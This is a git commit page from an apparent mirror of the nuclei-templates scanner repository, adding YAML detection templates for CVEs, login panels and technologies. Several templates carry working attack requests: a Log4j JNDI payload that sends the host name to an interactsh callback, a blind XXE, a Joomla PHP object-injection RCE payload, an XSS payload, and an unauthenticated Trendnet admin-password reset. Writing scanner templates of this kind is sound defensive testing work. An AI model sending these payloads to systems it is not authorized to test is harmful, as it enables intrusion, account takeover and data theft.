daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #3 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2022-02-05 23:41:24 +05:30 committed by GitHub
parent 6c39177ddc bba246646a
commit 0d146b2a49
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
24 changed files with 547 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
cves/2014/CVE-2014-8682.yaml
View File

@ -5,16 +5,19 @@ info:
author: dhiyaneshDK
severity: high
description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
remediation: Upgrade to a supported version of Gog.
reference:
- http://www.securityfocus.com/bid/71187
- http://seclists.org/fulldisclosure/2014/Nov/33
- http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
- http://gogs.io/docs/intro/change_log.html
- https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
- http://www.exploit-db.com/exploits/35238
- https://exchange.xforce.ibmcloud.com/vulnerabilities/98694
- http://www.securityfocus.com/archive/1/533995/100/0/threaded
tags: cve,cve2014,sqli,gogs
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2014-8682
cwe-id: CWE-89
metadata:
shodan-query: 'title:"Sign In - Gogs"'
@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/01

1
cves/2016/CVE-2016-10956.yaml
View File

@ -30,3 +30,4 @@ requests:
- type: status
status:
- 200
- 500

4
cves/2018/CVE-2018-17254.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2018-17254
info:
name: Joomla JCK Editor SQL Injection
name: Joomla! JCK Editor SQL Injection
author: Suman_Kar
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
severity: critical
@ -27,3 +27,5 @@ requests:
part: body
words:
- "nuclei-template"
# Enhanced by cs on 2022/02/01

1
cves/2019/CVE-2019-9618.yaml
View File

@ -31,3 +31,4 @@ requests:
- type: status
status:
- 200
- 500

31
cves/2020/CVE-2020-36365.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2020-36365
info:
name: Smartstore < 4.1.0 - Open redirect
author: 0x_Akoko
severity: medium
description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.
reference:
- https://github.com/smartstore/SmartStoreNET/issues/2113
- https://www.cvedetails.com/cve/CVE-2020-36365
- https://github.com/smartstore/SmartStoreNET
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-36365
cwe-id: CWE-601
metadata:
shodan-query: http.html:'content="Smartstore'
tags: cve,cve2020,redirect,smartstore
requests:
- method: GET
path:
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

54
cves/2021/CVE-2021-20150.yaml Normal file
View File

@ -0,0 +1,54 @@
id: CVE-2021-20150
info:
name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure
author: gy741
severity: medium
description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. Authentication can be bypassed and a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
reference:
- https://www.tenable.com/security/research/tra-2021-54
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 5.30
cve-id: CVE-2021-20150
cwe-id: CWE-287
metadata:
shodan-query: http.html:"TEW-827DRU"
tags: cve,cve2021,trendnet,disclosure,router
requests:
- raw:
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'ftp_username'
- 'ftp_password'
- 'ftp_permission'
- 'TEW-827DRU'
condition: and
- type: word
part: header
words:
- "text/html"
extractors:
- type: regex
part: body
name: password
group: 1
regex:
- '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />'

51
cves/2021/CVE-2021-20158.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2021-20158
info:
name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password change
author: gy741
severity: critical
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command.
reference:
- https://www.tenable.com/security/research/tra-2021-54
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-20158
cwe-id: CWE-287
metadata:
shodan-query: http.html:"TEW-827DRU"
tags: cve,cve2021,trendnet,disclosure,router,intrusive,dos
requests:
- raw:
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'setConnectDevice'
- 'setInternet'
- 'setWlanSSID'
- 'TEW-827DRU'
condition: and
- type: word
part: header
words:
- "text/html"

36
cves/2021/CVE-2021-32853.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2021-32853
info:
name: Erxes <= v0.23.0 XSS
author: dwisiswant0
severity: medium
description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag.
reference:
- https://securitylab.github.com/advisories/GHSL-2021-103-erxes/
- https://nvd.nist.gov/vuln/detail/CVE-2021-3285
metadata:
shodan-query: http.title:"erxes"
tags: cve,cve2021,xss,erxes,oss
requests:
- method: GET
path:
- "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'topic_id: "</script><script>alert(document.domain)</script>'
- "window.erxesEnv"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

27
exposed-panels/cisco/cisco-ucs-kvm-login.yaml Normal file
View File

@ -0,0 +1,27 @@
id: cisco-ucs-kvm-login
info:
name: Cisco UCS KVM Login
author: idealphase
severity: info
description: The KVM console is an interface accessible from the Cisco UCS Manager GUI or the KVM Launch Manager that emulates a direct KVM connection. Unlike the KVM dongle, which requires you to be physically connected to the server, the KVM console allows you to connect to the server from a remote location across the network.
reference: https://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/ucs-manager/GUI-User-Guides/Admin-Management/3-1/b_Cisco_UCS_Admin_Mgmt_Guide_3_1/b_Cisco_UCSM_GUI_Admin_Mgmt_Guide_3_1_chapter_01111.html
metadata:
shodan-query: 'http.title:"Cisco UCS KVM Direct"'
tags: panel,cisco,ucs,kvm
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Cisco UCS KVM Direct</title>'
- type: status
status:
- 200

25
exposed-panels/jamf-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: jamf-panel
info:
name: JAMF MDM Panel
author: pdteam
severity: info
metadata:
shodan-query: http.favicon.hash:1262005940
tags: jamf,panel,mdm
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: all
words:
- "Jamf Pro Login"
- "Jamf Cloud Node"
condition: or

4
exposed-panels/joomla-panel.yaml
View File

@ -1,7 +1,7 @@
id: joomla-panel
info:
name: Joomla Panel
name: Joomla! Panel
author: its0x08
severity: info
tags: panel,joomla
@ -16,3 +16,5 @@ requests:
- '<meta name="generator" content="Joomla! - Open Source Content Management" />'
- '/administrator/templates/isis/images/joomla.png'
condition: or
# Enhanced by cs on 2022/01/28

25
exposed-panels/trendnet/trendnet-tew827dru-login.yaml Normal file
View File

@ -0,0 +1,25 @@
id: trendnet-tew827dru-login
info:
name: TRENDnet TEW-827DRU Login
author: princechaddha
severity: info
metadata:
shodan-query: http.html:"TEW-827DRU"
tags: panel,router,trendnet
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'var model = "TEW-827DRU";'
- type: status
status:
- 200

33
exposed-panels/wallix-accessmanager-panel.yaml Normal file
View File

@ -0,0 +1,33 @@
id: wallix-accessmanager-panel
info:
name: Wallix Access Manager Panel
author: righettod
severity: info
reference: https://www.wallix.com/privileged-access-management/access-manager/
metadata:
shodan-query: http.title:"Wallix Access Manager"
tags: panel,wallix
requests:
- method: GET
path:
- '{{BaseURL}}/wabam'
- '{{BaseURL}}/wabam/favicon.ico'
stop-at-first-match: true
redirects: true
max-redirects: 3
matchers-condition: or
matchers:
- type: dsl
dsl:
- "status_code==200"
- "contains(tolower(body), '<title>wallix access manager</title>')"
condition: and
- type: dsl
dsl:
- "status_code==200"
- "('1745235488' == mmh3(base64_py(body)))"
condition: and

7
exposed-panels/zoho/manageengine-servicedesk.yaml
View File

@ -2,9 +2,11 @@ id: manageengine-servicedesk
info:
name: ZOHO ManageEngine ServiceDesk
author: dhiyaneshDK
author: dhiyaneshDK,righettod
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22
reference:
- https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22
- https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus+-+MSP%22
tags: panel,zoho,manageengine
requests:
@ -17,6 +19,7 @@ requests:
- type: word
words:
- '<title>ManageEngine ServiceDesk Plus</title>'
- '<title>ManageEngine ServiceDesk Plus - MSP</title>'
- type: status
status:

12
miscellaneous/addeventlistener-detect.yaml
View File

@ -1,8 +1,8 @@
id: addeventlistener-detect
info:
name: AddEventlistener detection
author: yavolo
name: DOM EventListener detection
author: yavolo,dwisiswant0
severity: info
tags: xss,misc
reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source
@ -10,10 +10,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}'
- "{{BaseURL}}"
matchers:
- type: word
- type: regex
part: body
words:
- 'window.addEventListener('
regex:
- (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118

25
technologies/erxes-detect.yaml Normal file
View File

@ -0,0 +1,25 @@
id: erxes-detect
info:
name: Erxes Detect
author: princechaddha
severity: info
metadata:
shodan-query: http.title:"erxes"
tags: tech,erxes
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "<title>erxes(.*)</title>"
- type: status
status:
- 200

34
technologies/smartstore-detect.yaml Normal file
View File

@ -0,0 +1,34 @@
id: smartstore-detect
info:
name: SmartStore Detect
author: princechaddha
severity: info
reference: https://github.com/smartstore/SmartStoreNET
metadata:
shodan-query: http.html:'content="Smartstore'
tags: tech,smartstore,oos
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<meta name="generator" content="Smartstore (.*)" />'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<meta name="generator" content="Smartstore (.*)" />'

3
technologies/telerik/telerik-dialoghandler-detect.yaml
View File

@ -2,7 +2,7 @@ id: telerik-dialoghandler-detect
info:
name: Detect Telerik Web UI Dialog Handler
author: organiccrap,zhenwarx
author: organiccrap,zhenwarx,nielsing
severity: info
reference:
- https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html
@ -28,6 +28,7 @@ requests:
- '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
- '{{BaseURL}}/Telerik.Web.UI.DialogHandler.axd?dp=1'
stop-at-first-match: true
matchers-condition: and

50
vulnerabilities/jamf/jamf-blind-xxe.yaml Normal file
View File

@ -0,0 +1,50 @@
id: jamf-blind-xxe
info:
name: JAMF Blind XXE / SSRF
author: pdteam
severity: medium
reference: https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
tags: xxe,ssrf,jamf
requests:
- raw:
- |
POST /client HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version='1.0' encoding='UTF-8' standalone="no"?>
<!DOCTYPE jamfMessage SYSTEM "http://{{interactsh-url}}/test.xml">
<ns2:jamfMessage xmlns:ns3="http://www.jamfsoftware.com/JAMFCommunicationSettings" xmlns:ns2="http://www.jamfsoftware.com/JAMFMessage">
<device>
<uuid>&test;</uuid>
<macAddresses />
</device>
<application>com.jamfsoftware.jamfdistributionserver</application>
<messageTimestamp>{{unix_time()}}</messageTimestamp>
<content xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="ns2:ResponseContent">
<uuid>00000000-0000-0000-0000-000000000000</uuid>
<commandType>com.jamfsoftware.jamf.distributionserverinventoryrequest</commandType>
<status>
<code>1999</code>
<timestamp>{{unix_time()}}</timestamp>
</status>
<commandData>
<distributionServerInventory>
<ns2:distributionServerID>34</ns2:distributionServerID>
</distributionServerInventory>
</commandData>
</content>
</ns2:jamfMessage>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "http"
- type: word
words:
- "com.jamfsoftware.jss"

38
vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml Normal file
View File

@ -0,0 +1,38 @@
id: jamf-log4j-jndi-rce
info:
name: JAMF Log4j JNDI RCE
author: pdteam
severity: critical
reference: https://github.com/random-robbie/jamf-log4j
tags: rce,jndi,log4j,jamf
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output

43
vulnerabilities/joomla/rusty-joomla.yaml Normal file
View File

@ -0,0 +1,43 @@
id: rusty-joomla
info:
name: Rusty Joomla RCE - Unauthenticated PHP Object Injection in Joomla CMS
author: leovalcante,kiks7
severity: critical
description: Unauthenticated PHP Object Injection in Joomla CMS from the release 3.0.0 to the 3.4.6 (releases from 2012 to December 2015) that leads to Remote Code Execution.
reference:
- https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/
- https://github.com/kiks7/rusty_joomla_rce
tags: joomla,rce,unauth,php,cms,objectinjection
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1
redirects: true
max-redirects: 2
cookie-reuse: true
extractors:
- type: regex
name: csrf
part: body
internal: true
group: 1
regex:
- "<input type=\"hidden\" name=\"([0-9a-z]{32})\" value=\"1\""
matchers:
- type: word
words:
- "http://rusty.jooml/;pkwxhxqxmdkkmscotwvh"
- "Failed to decode session object"
condition: and

28
vulnerabilities/other/antsword-backdoor.yaml Normal file
View File

@ -0,0 +1,28 @@
id: antsword-backdoor
info:
name: Antsword backdook
author: ffffffff0x
severity: critical
description: 蚁剑「绕过 disable_functions」插件生成的 shell
reference: https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9
tags: backdoor,antsword
requests:
- method: POST
path:
- "{{BaseURL}}/.antproxy.php"
headers:
Content-Type: application/x-www-form-urlencoded
body: 'ant=echo md5("antproxy.php");'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "951d11e51392117311602d0c25435d7f"
- type: status
status:
- 200

16
vulnerabilities/ransomware/deadbolt-ransomware.yaml Normal file
View File

@ -0,0 +1,16 @@
id: deadbolt-ransomware
info:
name: Deadbolt Ransomware Detection
author: pdteam
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "<title>ALL YOUR FILES HAVE BEEN LOCKED BY DEADBOLT.</title>"

4
workflows/joomla-workflow.yaml
View File

@ -1,7 +1,7 @@
id: joomla-workflow
info:
name: Joomla Security Checks
name: Joomla! Security Checks
author: daffainfo
description: A simple workflow that runs all Joomla related nuclei templates on a given target.
@ -10,4 +10,4 @@ workflows:
matchers:
- name: joomla
subtemplates:
- tags: joomla
- tags: joomla